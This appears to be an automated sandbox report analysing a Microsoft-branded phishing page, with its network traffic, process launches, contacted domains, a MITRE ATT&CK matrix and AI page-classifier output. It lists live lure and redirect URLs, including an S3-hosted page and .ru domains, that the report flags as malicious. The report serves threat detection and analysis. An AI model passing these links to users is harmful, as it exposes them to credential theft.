Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49782 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49783 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.16:49784 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 51.124.78.146:443 -> 192.168.2.16:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.31.69:443 -> 192.168.2.16:49786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.31.69:443 -> 192.168.2.16:49788 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.73.194.208:443 -> 192.168.2.16:49789 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.73.194.208:443 -> 192.168.2.16:49790 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.73.194.208:443 -> 192.168.2.16:49791 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.73.194.208:443 -> 192.168.2.16:49793 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.16:49821 version: TLS 1.2

Source: classification engine

Classification label: mal84.phis.win@18/49@56/126

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://t4w86zlc.r.sa-east-1.awstrack.me/L0/https:%2F%2Fdeverechemicals3.s3.amazonaws.com%2FDeveres3project002files.htm/1/010301919a36c887-bd0fadb9-69a9-4c66-8a65-7770fcfd1a1e-000000/4liC3XgeimVwv5ob78Q6Bl4nESk=173
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1940,i,307545642830519153,17498039111037960446,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1940,i,307545642830519153,17498039111037960446,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: Window Recorder

Window detected: More than 3 window changes detected

Persistence and Installation Behavior

AI detected landing page (webpage, office document or email)

Source: https://deverechemicals3.s3.amazonaws.com/Deveres3project002files.htm	LLM: Page with brand: 'Microsoft' contains button: 'Continue' Source: '0.0.pages.csv'
Source: https://deverechemicals3.s3.amazonaws.com/Deveres3project002files.htm	LLM: Page with brand: 'Microsoft' contains button: 'continue' Source: '0.1.pages.csv'

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	Windows Management Instrumentation	1 Browser Extensions	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Scripting	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 Registry Run Keys / Startup Folder	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
https://t4w86zlc.r.sa-east-1.awstrack.me/L0/https:%2F%2Fdeverechemicals3.s3.amazonaws.com%2FDeveres3project002files.htm/1/010301919a36c887-bd0fadb9-69a9-4c66-8a65-7770fcfd1a1e-000000/4liC3XgeimVwv5ob78Q6Bl4nESk=173	0%	Avira URL Cloud	safe

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
a.nel.cloudflare.com	35.190.80.1	true	false		unknown
50ou-vasil-levski.com	78.142.63.8	true	false		unknown
welshpoolsharkspnu.ru	172.67.206.158	true	false		unknown
thebookwormprojectonu.ru	104.21.79.65	true	true		unknown
fonts.shopifycdn.com	185.146.173.20	true	false		unknown
cdn.shopify.com	23.227.60.200	true	false		unknown
shops.myshopify.com	23.227.38.74	true	false		unknown
s3-w.us-east-1.amazonaws.com	16.182.66.145	true	false		unknown
shop.app	185.146.173.20	true	false		unknown
whatsapp.carthike.com	188.114.97.3	true	false		unknown
code.jquery.com	151.101.2.137	true	false		unknown
gw-monorail-production-gateway-1-apps-a-us-ce1-eg6.shopifycloud.com	34.111.205.129	true	false		unknown
cdnjs.cloudflare.com	104.17.25.14	true	false		unknown
challenges.cloudflare.com	104.18.94.41	true	false		unknown
www.google.com	142.250.186.68	true	false		unknown
baconredirects-elb-1nz5mum1h1a1y-1105981855.sa-east-1.elb.amazonaws.com	15.229.76.122	true	false		unknown
monorail-edge.shopifysvc.com	unknown	unknown	false		unknown
t4w86zlc.r.sa-east-1.awstrack.me	unknown	unknown	false		unknown
deverechemicals3.s3.amazonaws.com	unknown	unknown	false		unknown
55db36-5b.myshopify.com	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://deverechemicals3.s3.amazonaws.com/Deveres3project002files.htm	true		unknown
https://50ou-vasil-levski.com/tvavx.php	false		unknown
https://welshpoolsharkspnu.ru/NrFB2/#J	true		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
142.250.186.68	www.google.com	United States		15169	GOOGLEUS	false
78.142.63.8	50ou-vasil-levski.com	Bulgaria		31083	TELEPOINTBG	false
216.58.206.74	unknown	United States		15169	GOOGLEUS	false
104.18.94.41	challenges.cloudflare.com	United States		13335	CLOUDFLARENETUS	false
23.227.38.74	shops.myshopify.com	Canada		13335	CLOUDFLARENETUS	false
23.227.60.200	cdn.shopify.com	Canada		62679	SHOPIFYASN1CA	false
142.250.181.234	unknown	United States		15169	GOOGLEUS	false
74.125.206.84	unknown	United States		15169	GOOGLEUS	false
142.250.181.238	unknown	United States		15169	GOOGLEUS	false
15.229.76.122	baconredirects-elb-1nz5mum1h1a1y-1105981855.sa-east-1.elb.amazonaws.com	United States		16509	AMAZON-02US	false
185.146.173.20	fonts.shopifycdn.com	Sweden		200760	ELOGIC-ASElogicSrl-CloudServicesIT	false
142.250.186.131	unknown	United States		15169	GOOGLEUS	false
35.190.80.1	a.nel.cloudflare.com	United States		15169	GOOGLEUS	false
151.101.194.137	unknown	United States		54113	FASTLYUS	false
172.217.18.10	unknown	United States		15169	GOOGLEUS	false
1.1.1.1	unknown	Australia		13335	CLOUDFLARENETUS	false
16.182.66.145	s3-w.us-east-1.amazonaws.com	United States		unknown	unknown	false
172.67.206.158	welshpoolsharkspnu.ru	United States		13335	CLOUDFLARENETUS	false
34.111.205.129	gw-monorail-production-gateway-1-apps-a-us-ce1-eg6.shopifycloud.com	United States		15169	GOOGLEUS	false
104.18.95.41	unknown	United States		13335	CLOUDFLARENETUS	false
104.21.79.65	thebookwormprojectonu.ru	United States		13335	CLOUDFLARENETUS	true
151.101.2.137	code.jquery.com	United States		54113	FASTLYUS	false
239.255.255.250	unknown	Reserved		unknown	unknown	false
188.114.97.3	whatsapp.carthike.com	European Union		13335	CLOUDFLARENETUS	false
142.250.185.131	unknown	United States		15169	GOOGLEUS	false
172.217.16.195	unknown	United States		15169	GOOGLEUS	false
104.17.25.14	cdnjs.cloudflare.com	United States		13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.16

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1501284
Start date and time:	2024-08-29 17:00:35 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Sample URL:	https://t4w86zlc.r.sa-east-1.awstrack.me/L0/https:%2F%2Fdeverechemicals3.s3.amazonaws.com%2FDeveres3project002files.htm/1/010301919a36c887-bd0fadb9-69a9-4c66-8a65-7770fcfd1a1e-000000/4liC3XgeimVwv5ob78Q6Bl4nESk=173
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled
Analysis Mode:	stream
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal84.phis.win@18/49@56/126

Warnings

Exclude process from analysis (whitelisted): svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.186.131, 74.125.206.84, 142.250.181.238, 34.104.35.123, 172.217.18.10, 172.217.16.195, 142.250.181.234, 216.58.206.74, 199.232.210.172
Excluded domains from analysis (whitelisted): fonts.googleapis.com, clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, fonts.gstatic.com, ajax.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com
Not all processes where analyzed, report is missing behavior information
VT rate limit hit for: https://t4w86zlc.r.sa-east-1.awstrack.me/L0/https:%2F%2Fdeverechemicals3.s3.amazonaws.com%2FDeveres3project002files.htm/1/010301919a36c887-bd0fadb9-69a9-4c66-8a65-7770fcfd1a1e-000000/4liC3XgeimVwv5ob78Q6Bl4nESk=173

LLM Input / Output

Input	Output
URL: https://deverechemicals3.s3.amazonaws.com/Deveres3project002files.htm Model: jbxai	{ "brand":["Microsoft"], "contains_trigger_text":true, "prominent_button_name":"Continue", "text_input_field_labels":["unknown"], "pdf_icon_visible":false, "has_visible_captcha":true, "has_urgent_text":false, "has_visible_qrcode":false}

URL: https://deverechemicals3.s3.amazonaws.com/Deveres3project002files.htm Model: jbxai	{ "brand":["Microsoft"], "contains_trigger_text":true, "prominent_button_name":"Continue", "text_input_field_labels":["unknown"], "pdf_icon_visible":false, "has_visible_captcha":false, "has_urgent_text":false, "has_visible_qrcode":false}

URL: https://deverechemicals3.s3.amazonaws.com/Deveres3project002files.htm Model: jbxai	{ "brand":["Microsoft"], "contains_trigger_text":true, "prominent_button_name":"continue", "text_input_field_labels":["unknown"], "pdf_icon_visible":false, "has_visible_captcha":true, "has_urgent_text":false, "has_visible_qrcode":false}

URL: https://deverechemicals3.s3.amazonaws.com/Deveres3project002files.htm Model: jbxai	{ "brand":["Microsoft"], "contains_trigger_text":true, "prominent_button_name":"Continue", "text_input_field_labels":["unknown"], "pdf_icon_visible":false, "has_visible_captcha":false, "has_urgent_text":false, "has_visible_qrcode":false}

URL: https://welshpoolsharkspnu.ru/NrFB2/#J Model: jbxai

URL: https://welshpoolsharkspnu.ru/NrFB2/#J Model: jbxai	{ "brand":["CLOUDFLARE"], "contains_trigger_text":false, "prominent_button_name":"unknown", "text_input_field_labels":["unknown"], "pdf_icon_visible":false, "has_visible_captcha":false, "has_urgent_text":false, "has_visible_qrcode":false}

URL: https://welshpoolsharkspnu.ru/NrFB2/#J Model: jbxai	{ "brand":["CLOUDFLARE"], "contains_trigger_text":false, "prominent_button_name":"unknown", "text_input_field_labels":["unknown"], "pdf_icon_visible":false, "has_visible_captcha":false, "has_urgent_text":false, "has_visible_qrcode":false}

URL: https://welshpoolsharkspnu.ru/NrFB2/#J Model: jbxai	{ "brand":["Microsoft"], "contains_trigger_text":false, "prominent_button_name":"Next", "text_input_field_labels":["unknown"], "pdf_icon_visible":false, "has_visible_captcha":false, "has_urgent_text":false, "has_visible_qrcode":false}

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Aug 29 14:01:04 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2673
Entropy (8bit):	3.9867120815933332
Encrypted:	false
SSDEEP:
MD5:	749201E36EA6551DBB4E5EEE2159B6F9
SHA1:	D6D876E0FF1010043F9F1DE19FF8507B95C451B1
SHA-256:	74BEB8752DDE296AA392BBEC80DD5411B3AD1C245C30B583BD58EE762B7BBEF6
SHA-512:	A9A6BD1479C6EB50FC5C5AE1EB3B3891E308318AC5DDFDC2F97B1C9D1FB7E705ED5C3E504A6C2CC0BA4048C117351E4AF7BA66848AB24C53DB87DE02D0D401A3
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....B8E$...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.x....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y!x....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y!x....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y!x..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y#x...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Aug 29 14:01:04 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2675
Entropy (8bit):	4.0043056268648485
Encrypted:	false
SSDEEP:
MD5:	2F01C511B93CF150705C90C801A3AACC
SHA1:	ACA62BE45D86B79B4E8059F7900526EF5B19AD6E
SHA-256:	AC7F9232ED8FCBF935C786405199B22632FC07F18D6CEA236DE2E841EE41033C
SHA-512:	F1C4F97D2EC968F03CEE4DEF38CA04584836C4C347BD25173BCD6E23A537AA9E280FDCB5161E95C405620A912E681FFA68DFAE3A805A5DFAF7568E777872BA8B
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,......,E$...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.x....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y!x....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y!x....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y!x..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y#x...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2689
Entropy (8bit):	4.009491680494161
Encrypted:	false
SSDEEP:
MD5:	28EEB995C17FD037A1FF25288416FA7E
SHA1:	C0750092FA74381A4185555B730B87EC5855A6F6
SHA-256:	5D4A8C991B65DED670186239C769E92AB0A452418A4FCEEE5074A730309D1274
SHA-512:	F2C4D08418EB8A8EAC1C264034C0519635307E66892F4B6B761347A7AEF05FDE6B070C1EE166932811E5D435FAF5DEDEDD9C68F0AD6F151E64685D6BDCF85A57
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.x....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y!x....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y!x....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y!x..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Aug 29 14:01:04 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.998806622049494
Encrypted:	false
SSDEEP:
MD5:	2A4FB7F4F084BEAB521564B1BD059962
SHA1:	61E1312E8283D2D8304AE186D3388E7DB533BBB8
SHA-256:	EB19FC0F0BF2765DC12A80CA356F71B99DBA90155B2D68D05D94AA874B39D3C9
SHA-512:	9C3A6B1B4B77321E35C724EF75F93CE53C786F985ECF9E6697300980C096971C3C407A0C631E44AE8080DBE9A46B26997F2D4DA72059FF7BC6B19D576136BB76
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,....'h&E$...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.x....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y!x....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y!x....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y!x..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y#x...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Aug 29 14:01:04 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.9900623104347828
Encrypted:	false
SSDEEP:
MD5:	4B8903B786B89D5D311C386EB624882C
SHA1:	A4C2629E16BD60B77E45FA307A4392F8ADB8C3A0
SHA-256:	68A63572F32E9982E8A7D9358D92FC087024FF01E3F1316AD68B752D9BAA7402
SHA-512:	E5B5F5C61BA387D9A3B1A18C12F481285C6981E3BE38D358AF003DF9D0E78402CA250A0B99DDA20284CF070669C327D8969A3211140EB7425315DD37F2D2B98E
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,......2E$...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.x....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y!x....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y!x....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y!x..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y#x...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Aug 29 14:01:04 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	3.9962665309506535
Encrypted:	false
SSDEEP:
MD5:	3875806B0FA36B8F2F0F5B90D09AAD07
SHA1:	F0A690BBB3F4347699C69F6F00452CFF4EFEBEBA
SHA-256:	4F8CEA528530D19C0FCD89657A6BFD060575EE44AA146993BDC312B536829E50
SHA-512:	EB53107895BEDAF140B4648C3482193F0A531852B843E0C40F7CF7E3A5AA482CAA058C620EBCCD6CFD2C485D4E3872B053D43AF80A157313B6E0E8F9065C379B
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,....H@.E$...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.x....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y!x....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y!x....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y!x..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y#x...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. 